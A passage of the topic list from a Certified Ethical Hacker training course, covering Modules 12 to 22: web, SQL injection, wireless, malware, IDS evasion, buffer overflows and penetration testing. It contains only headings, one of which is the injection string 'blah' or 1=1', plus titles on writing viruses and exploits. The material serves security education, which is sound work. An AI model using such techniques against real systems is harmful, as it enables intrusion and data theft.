    • Hacking Tool: cmdasp.asp
    • Escalating Privileges on IIS
    • Hacking Tool: IISCrack.dll
    • Hacking Tool: ispc.exe
    • IIS WebDav Vulnerability
    • Hacking Tool: WB
    • RPC Exploit-GUI
    • Hacking Tool: DComExpl_UnixWin32
    • Hacking Tool: Plonk
    • Unspecified Executable Path Vulnerability
    • Hacking Tool: CleanIISLog
    • File System Traversal Countermeasures
    • Microsoft HotFix Problems
    • UpdateExpert
    • Cacls utility
    • Network Tool: Whisker
    • N-Stealth Scanner
    • Hacking Tool: WebInspect
    • Network Tool: Shadow Security Scanner
    Certified Ethical Hacker (CEH) Module 12: Web Application Vulnerabilities
    • Documenting the Application Structure
    • Manually Inspecting Applications
    • Using Google to Inspect Applications
    • Directory Structure
    • Hacking Tool: Instant Source
    • Java Classes and Applets
    • Hacking Tool: Jad
    • HTML Comments and Contents
    • Hacking Tool: Lynx
    • Hacking Tool: Wget
    • Hacking Tool: Black Widow
    • Hacking Tool: WebSleuth
    • Cross Site Scripting
    • Session Hijacking using XSS
    • Cookie Stealing
    • Hacking Tool: IEEN
    • Hacking Tool: IEflaw
    • Exposing Sensitive Data with Google

    Certified Ethical Hacker (CEH) Module 13: Web Based Password Cracking Techniques
    • Basic Authentication
    • Message Digest Authentication
    • NTLM Authentication
    • Certificate based Authentication
    • Digital Certificates
    • Microsoft Passport Authentication
    • Forms based Authentication
    • Creating Fake Certificates
    • Hacking Tool: WinSSLMiM
    • Password Guessing
    • Default Account Database
    • Hacking Tool: WebCracker
    • Hacking Tool: Brutus
    • Hacking Tool: ObiWan
    • Hacking Tool: Munga Bunga
    • Password dictionary Files
    • Attack Time
    • Hacking Tool: Variant
    • Hacking Tool: PassList
    • Query Strings
    • Post data
    • Hacking Tool: cURL
    • Stealing Cookies
    • Hacking Tool: CookieSpy
    • Hacking Tool: ReadCookies
    • Hacking Tool: SnadBoy

    Certified Ethical Hacker (CEH) Module 14: SQL Injection
    • What is SQL Injection Vulnerability?
    • SQL Insertion Discovery
    • Blank sa Password
    • Simple Input Validation
    • SQL Injection
    • OLE DB Errors
    • 1=1
    • blah' or 1=1
    • Preventing SQL Injection
    • Database Specific SQL Injection
    • Hacking Tool: SQLDict
    • Hacking Tool: SQLExec
    • Hacking Tool: SQLbf
    • Hacking Tool: SQLSmack
    • Hacking Tool: SQL2.exe
    • Hacking Tool: Oracle Password Buster

    Certified Ethical Hacker (CEH) Module 15: Hacking Wireless Networks
    • 802.11 Standards
    • What is WEP?
    • Finding WLANs
    • Cracking WEP keys
    • Sniffing Traffic
    • Wireless DoS Attacks
    • WLAN Scanners
    • WLAN Sniffers
    • MAC Sniffing
    • Access Point Spoofing
    • Securing Wireless Networks
    • Hacking Tool: NetTumbler
    • Hacking Tool: AirSnort
    • Hacking Tool: AiroPeek
    • Hacking Tool: WEP Cracker
    • Hacking Tool: Kismet
    • Hacking Tool: AirSnarf
    • WIDZ- Wireless IDS

    Certified Ethical Hacker (CEH) Module 16: Virus and Worms
    • Chernobyl
    • ExploreZip
    • I Love You
    • Melissa
    • Pretty Park
    • Code Red Worm
    • W32/Klez
    • BugBear
    • W32/Opaserv Worm
    • Nimda
    • Code Red
    • SQL Slammer
    • Batch File Virus Creator
    • How to write your own Virus?
    • Worm Construction Kits
    Certified Ethical Hacker (CEH) Module 17: Novell Hacking
    • Common accounts and passwords
    • Accessing password files
    • Password crackers
    • Netware Hacking Tools
    • Chknull
    • NOVELBFH
    • NWPCRACK
    • Bindery
    • BinCrack
    • SETPWD.NLM
    • Kock
    • userdump
    • Burglar
    • Getit
    • Spooflog
    • Gobbler
    • Novelffs
    • Pandora

    Certified Ethical Hacker (CEH) Module 18: Linux Hacking
    • Why Linux ?
    • Linux Basics
    • Compiling Programs in Linux
    • Scanning Networks
    • Mapping Networks
    • Password Cracking in Linux
    • Linux Vulnerabilities
    • SARA
    • TARA
    • Sniffing
    • A Pinger in Disguise
    • Session Hijacking
    • Linux Rootkits
    • Linux Security Countermeasures
    • IPChains and IPTables
    Certified Ethical Hacker (CEH) Module 19: IDS, Firewalls and Honeypots
    • Intrusion Detection System
    • System Integrity Verifiers
    • How are Intrusions Detected?
    • Anomaly Detection
    • Signature Recognition
    • How does IDS match Signatures with Incoming Traffic?
    • Protocol Stack Verification
    • Application Protocol Verification
    • What Happens after an IDS Detects an Attack?
    • IDS Software Vendors
    • SNORT
    • Evading IDS (Techniques)
    • Complex IDS Evasion
    • Hacking Tool: fragrouter
    • Hacking Tool: TCPReplay
    • Hacking Tool: SideStep
    • Hacking Tool: NIDSbench
    • Hacking Tool: ADMutate
    • IDS Detection
    • Tools to Detect Packet Sniffers
    • Tools to inject strangely formatted packets onto the wire
    • Hacking Through Firewalls
    • Placing Backdoors through Firewalls
    • Hiding behind Covert Channels
    • Hacking Tool: Ncovert
    • What is a Honeypot?
    • Honeypots Evasion
    • Honeypots vendors
    • Hacking Tool: Honeyd

    Certified Ethical Hacker (CEH) Module 20: Buffer Overflows
    • What is a Buffer Overflow?
    • Exploitation
    • Assembly Language Basics
    • How to Detect Buffer Overflows in a Program?
    • Skills Required
    • CPU/OS Dependency
    • Understanding Stacks
    • Stack Based Buffer Overflows
    • Buffer Overflow Technical Implementation
    • Writing your own Buffer Overflow Exploit in C
    • Defense against Buffer Overflows
    • Type Checking Tools for Compiling Programs
    • StackGuard
    • Immunix
    Certified Ethical Hacker (CEH) Module 21: Cryptography
    • What is PKI?
    • Digital Certificates
    • RSA
    • MD-5
    • RC-5
    • SHA
    • SSL
    • PGP
    • SSH
    • Encryption Cracking Techniques

    Certified Ethical Hacker (CEH) Module 22: Penetration Testing Methodologies
    • Physical Security Testing
    • Port Scanning Testing
    • System Identification Testing
    • Services Identification Testing
    • Vulnerability Research and Verification Testing
    • Application Testing and Source Code Review
    • Router Testing
    • Firewall Testing
    • Intrusion Detection System Testing
    • Domain Trusted Systems Testing
    • Application Password Cracking Testing
    • Denial of Service Testing
    • Containment Measures Testing
    • Information Security
    • Document Grinding
    • Gathering Competitive Intelligence
    • Social Engineering Testing
    • Wireless Networks Testing
    • Cordless Communications Testing
    • Infrared Systems Testing
    • Modem Testing
    • Writing Penetration Testing Reports
